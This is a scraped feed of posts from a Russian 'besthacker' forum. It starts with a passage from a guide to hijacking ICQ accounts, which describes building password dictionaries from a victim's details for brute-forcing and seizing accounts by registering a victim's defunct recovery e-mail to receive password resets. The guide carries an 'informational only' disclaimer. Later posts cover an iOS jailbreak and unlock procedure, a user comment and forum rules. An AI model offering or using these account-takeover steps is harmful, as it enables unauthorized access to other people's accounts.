добавьте этот пароль в словарь. И добавьте туда этот юин (в смысле, ко всем вашим паролям добавьте юин, т.к.<br />многие пользователи ставят пароль такой же как юин). За 10-30 минут &quot;работы&quot; у вас должен получиться список слов эдак на 100-400.<br />Потом добавьте туда пару десятков просто общеупотребляемых слов, вроде 1234567 123456 654321 1111 1 sex, rock, metal, city, qwerty, asdfg и все в этом роде.<br />После этого брутим (ниже) на эти пассы. Если юин у вас, то все свободны . Если нет, то способ следующий.</p> <p>Способ мыльница. Работает, только если у юзера есть мыло (e-mail). Смотрим в профиле юзера, есть-ли основное мыло. Если есть, то читаем. Смотрим внимательно на мыло. Если оно вида &quot;хрен_знает_что.какой-нить_известный_бесплатный_домен&quot;, то нам повезло. Шанс на это 1 из 500. Например, если мыло ghnncmhlp@yandex.ru Тогда скорее всего этого мыла в действительности не существует. Если это так, идем на этот сервак (в нашем случае, яндекс.ру) и регистрируем это мыло. Идем сюда и говорим что пароль бы нам надо получить. Указываем наш юин и ваше только что созданное мыло и жмем заветную кнопку. Через минуту у вас в ящике должен лежать пароль.</p> <p>И помним: <strong><span style="color: red">СТАТЬЯ ПРЕДСТАВЛЕННА ИСКЛЮЧИТЕЛЬНО В ОЗНАКОМИТЕЛЬНЫХ ЦЕЛЯХ!</span></strong></p> mybb@mybb.ru (Admin) Fri, 18 Feb 2011 11:10:37 +0300 http://besthacker.mybb.ru/viewtopic.php?pid=7#p7 http://besthacker.mybb.ru/viewtopic.php?pid=6#p6 <p>Энтузиасты из Chronic Dev-Team представили долгожданную Windows-версию утилиты Greenpois0n для непривязанного джейлбрейка iOS-устройств, работающих под управлением последней на данный момент версии «прошивки» 4.2.1.</p> <p><img class="postimg" loading="lazy" src="http://www.sotovik.ru/images/news2/07.02.2011/ios1.png" alt="http://www.sotovik.ru/images/news2/07.02.2011/ios1.png" /></p> <p>Ранее свет увидел вариант Greenpois0n для Mac-пользователей. Под Linux инструмент еще не готов. Заметим, Greenpois0n всё еще находится на бета-стадии разработки, поэтому ошибки не исключены. Впрочем, в отсутствие альтернатив радость от непривязанного джейлбрейка iPhone, iPad или iPod touch воистину велика. До появления Greenpois0n джейлбрейк iOS 4.2.1 был возможен лишь привязанный: в случае перезагрузки или выключения аппарата приходилось вновь проводить искомые манипуляции, включая доступ к компьютеру — без них устройство вообще не работало.</p> <p>Внимание: Greenpois0n предполагает четкое следование инструкции, иначе джейлбрейк может не пройти.</p> <p><img class="postimg" loading="lazy" src="http://www.sotovik.ru/images/news2/07.02.2011/ios2.png" alt="http://www.sotovik.ru/images/news2/07.02.2011/ios2.png" /></p> <p>Кстати, о разблокировании речь не ведется, но владельцам iPhone 4 пригодится утилита TinyUmbrella, позволяющая обновиться до iOS 4.2.1 без модернизации модемной «прошивки», что и предполагает дальнейшее разблокирование посредством UltraSn0w.</p> <p>Следует понимать, что эксплуатируемая Greenpois0n уязвимость закрыта в бета-релизах iOS 4.3, однако хакеры уже обнаружили очередной «дефект», позволяющий реализовать джейлбрейк и после выпуска iOS 4.3.</p> <p>В следующих выпусках Greenpois0n получит поддержку Apple TV, а также анимированный пользовательский логотип, который будет появляться вместо статичного «яблока» в момент загрузки.</p> <p></p> <p>В прошлом году Бюро регистрации авторских прав Библиотеки Конгресса легализовало процедуру джейлбрейка iPhone и запуск неавторизованных сторонних приложений. Впрочем, Стив Джобс категорически против подобного, ведь джейлбрейк вовсю используется для установки пиратских версий приложений и игр. Ну а вообще он тесно связан с неофициальным магазином iOS-приложений Cydia, на витринах которого в обилии представлены бесплатные и платные программы, превращающие iPhone в гораздо более интересный и полноценный смартфон. Так, например, коммуникатор сможет выступать бепроводной точкой доступа, раздающей 3G-интернет по Wi-Fi-каналу, а FaceTime-видеозвонки на iPhone 4 легко совершать также через 3G-сеть.</p> <p><img class="postimg" loading="lazy" src="http://www.sotovik.ru/images/news2/07.02.2011/ios3.png" alt="http://www.sotovik.ru/images/news2/07.02.2011/ios3.png" /> <img class="postimg" loading="lazy" src="http://www.sotovik.ru/images/news2/07.02.2011/ios4.png" alt="http://www.sotovik.ru/images/news2/07.02.2011/ios4.png" /> </p> <p><strong><span style="font-size: 14px">Если вам нужен анлок – установите ultrasn0w в Cydia.</span></strong></p> <p>1.Запустите Cydia.<br />2.Перейдите в Manage, затем кликните на Sources.<br />3.Нажмите кнопку Edit в верхнем правом углу.<br />4.Затем нажмите кнопку Add в левом верхнем углу.<br />5.Введите адрес <a href="http://repo666.ultrasn0w.com" rel="nofollow" target="_blank">http://repo666.ultrasn0w.com</a> и жмите Add Source.<br />6.Затем жмите Done и кликайте на новый репозиторий,<br />7.Теперь необходимо выбрать ultrasn0w и нажать кнопку Install сверху справа.<br />8.Перезагрузите iPhone.<br />9.Для T-Mobile USA выключите 3G.<br />10.Должна появиться сеть.</p> <p><span style="font-style: italic"><strong>Поздравляем вы разлочили ваш iPhone!</strong></span></p> <p><span style="color: blue">И помните:</span> <span style="color: red">ВСЕ ЧТО ВЫ ДЕЛАЕТЕ, ТО ДЕЛАЕТЕ НА СВОЙ СРАХ И РИСК, АДМИНИСТРАЦИЯ САЙТА И АВТОР МАТЕРИАЛА ЗА ПОЛОМКУ АППАРАТА ОТВЕТСТВЕННОСТИ НЕ НЕСЕТ!!!</span><strong></strong></p> mybb@mybb.ru (Admin) Fri, 18 Feb 2011 10:31:52 +0300 http://besthacker.mybb.ru/viewtopic.php?pid=6#p6 http://besthacker.mybb.ru/viewtopic.php?pid=5#p5 <p>Да пост конечно интересный. Но как быть с теми кто прочитав Вашу статью использует ее в коварных целях???? :tomato:</p> mybb@mybb.ru (voodoo) Fri, 03 Dec 2010 01:33:03 +0300 http://besthacker.mybb.ru/viewtopic.php?pid=5#p5 http://besthacker.mybb.ru/viewtopic.php?pid=2#p2 <p><span style="display: block; text-align: center"><em class="bbuline"><span style="color: red"><span style="font-family: Arial Black"><span style="font-size: 16px">На форуме запрещается</span></span></span></em>:</span> </p> <p>1. Использовать ненормативную лексику (как прямую, так и завуалированную) <br />Наказание - удаление сообщения, бан на срок от 5 до 7 суток без права отсылки личных сообщений. </p> <p>2. Сознательно коверкать Русский язык (специально допускать ошибки, использовать язык падонкафф и т.п.). <br />Наказание - редактирование, либо удаление сообщения, бан на 36 часов с правом отсылки личных сообщений. </p> <p>3. Любые проявления нетерпимости к каким-либо национальностям, религиям и местам проживания. <br />Наказание - удаление сообщения, пожизненный бан. </p> <p>4. Пропаганда наркотиков или насилия. <br />Наказание - удаление сообщения, пожизненный бан, удаление учетной записи. </p> <p>5. Любая реклама, не согласованная с администрацией проекта, ссылки на нелегальные ресурсы в интернете. <br />Наказание - удаление сообщения, пожизненный бан, удаление учетной записи (на усмотрение модератора). </p> <p>6. Писать бесполезные и бессодержательные сообщения (флудить). Писать сообщения как полностью, так и частично не по теме (оффтопить). <br />Наказание - удаление лишних сообщений, бан на 3 суток с правом отсылки личных сообщений. </p> <p>7. Писать одинаковые сообщения в разные темы или создавать новые темы, схожие с уже существующими. <br />Наказание - удаление лишних сообщений, бан на 4 суток с правом отсылки личных сообщений. </p> <p>8. Задавать вопросы и выдвигать предложения, предварительно не проверив форум на наличие таких же вопросов и предложений. Особенно, если они есть в форуме для новичков! <br />Наказание - бан на 36 часов с правом отсылки личных сообщений. </p> <p>9. Запрещены аватары и подписи расистского, эротического и порнографического характера, выражающие жестокость и насилие, содержащие нецензурные или грубые выражения. <br />Запрещено включать ссылки на другие ресурсы в интернете, не согласованные с администрацией форума. <br />Аватар и подпись пользователя не должны вызывать отрицательные эмоции и должны соответствовать требованиям общепринятой морали. <br />В подписи пользователя запрещено использовать любые графические изображения, смайлы и флэш-анимацию за исключением форумных наград, значков и гербов команд, согласованных с администрацией, которые должны быть расположены в один ряд и должны соответствовать принятым на форуме размерам. Всего в подписи должно быть не более 10 графических изображений. Герб или значек команды не должен быть размером более форумных наград. Пожелания, цитаты, высказывания не более двух строк и должны быть стандартного цвета и размера. <br />Наказание - удаление аватара или подписи, бан на 2 суток с правом отсылки личных сообщений. </p> <p>10. Намеренно оскорблять других участников форума. <br />Наказание - бан на срок от 7 до 14 суток без права отсылки личных сообщений. <br />Примечание - оскорбление представителя администрации - вечный бан. </p> <p>11. Оспаривать действия модераторов форума - бан 10 дней с правом отсылки личных сообщений. </p> <p>12. Оскорбление пользователей (или сознательное создание помех их игре) в онлайне. <br />Наказание - Отключение от онлайна на срок от 3 до 7 суток. Бан на форуме на срок от 7 до 14 суток без права отсылки личных сообщений.На усмотрение модератора, срок бана может быть увеличен, в зависимости от тяжести проступка. <br />Примечание. В случае необоснованных жалоб, фальсификации отчетов, либо скриншотов личных сообщений, пользователь может быть наказан за клевету баном на срок до 60 дней без права отсылки личных сообщений. </p> <p>13. Оскорбление пользователей, домогательства и флуд в личных сообщениях. <br />Наказание - запрет отсылки личных сообщений на 7 суток, запрет публикаций сообщений на форуме без прочтения модератором на 14 суток. <br />Примечание. В случае необоснованных жалоб, фальсификации отчетов, либо скриншотов личных сообщений, пользователь может быть наказан за клевету баном на срок до 60 дней без права отсылки личных сообщений. </p> <p>14. Оставлять незакрытые теги в сообщениях, срок существования которых более 20 минут. <br />Наказание - правка сообщения, устное предупреждение, либо бан на 36 часов с правом отсылки личных сообщений на усмотрение модератора. </p> <p>15. Вести на форуме деятельность, способствующую разжиганию скандала. <br />Наказание - бан от 30 суток до пожизненного, без права отсылки личных сообщений. <br />То же, совершенное повторно, а так же организованной группой и по предварительному сговору - <br />пожизненный бан. <br /> </p> <p>16. Злоупотребление цитатами, цитирование частей сообщений, не относящихся к ответу на вопрос. <br />Наказание - устное предупреждение модератора, удаление сообщения, бан на 36 часов с правом отсылки личных сообщений (на усмотрение модератора). </p> <p>17. Запрещается копировать уже опубликованные в Интернете тексты, если возможно давать на них ссылки(за исключением ссылок на ресурсы подпадающие под действие п.9 Правил). Окончательное решение о допустимости каждой конкретной публикации остается за Администрацией форума. <br />Наказание - редактирование, либо удаление сообщения, бан на 36 часов с правом отсылки личных сообщений. </p> <p>18. Запрещено пользоваться крупными, полужирными и цветными шрифтами в сообщениях и подписи пользователя, кроме сообщений в разделе Общение. <br />Шрифты красного цвета разрешено применять в сообщениях только администраторам и модераторам форума, пользователям разрешено только для оформления поздравлений. <br />Наказание - удаление сообщений и подписей, бан на 2 дня с правом переписки. </p> <p>19. Регистрация нескольких ников (клонов) одним пользователем. <br />Наказание – устное предупреждение, удаление всех лишних клонов (по усмотрению модератора). В случае, если повторная регистрация сделана после вынесения наказания в виде бана – пожизненный бан всех найденных клонов. </p> <p>20. Повторная регистрация другого ника в период действия текущего наказания карается пожизненным банном обоих ников. </p> <p>21. По всем пунктам Правил сроки наказания могут быть увеличены/уменьшены по представлению модератора, после утверждения администрацией проекта. </p> <p>Будьте внимательны, и старайтесь не нарушать данные правила</p> mybb@mybb.ru (Admin) Wed, 10 Nov 2010 17:55:08 +0300 http://besthacker.mybb.ru/viewtopic.php?pid=2#p2